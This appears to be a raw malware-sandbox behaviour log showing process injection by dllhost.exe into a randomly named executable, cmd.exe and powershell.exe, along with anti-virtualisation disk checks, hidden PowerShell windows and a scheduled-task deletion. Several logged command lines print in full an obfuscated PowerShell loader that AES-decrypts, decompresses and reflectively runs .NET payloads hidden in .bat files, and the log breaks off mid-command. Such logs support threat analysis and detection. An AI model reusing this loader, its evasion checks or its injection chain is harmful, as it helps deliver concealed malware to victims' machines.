Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2710000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1490000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2070000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2512A6B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1BEB0A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253DFF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\users\user\desktop\x.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\users\user\desktop\x.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach 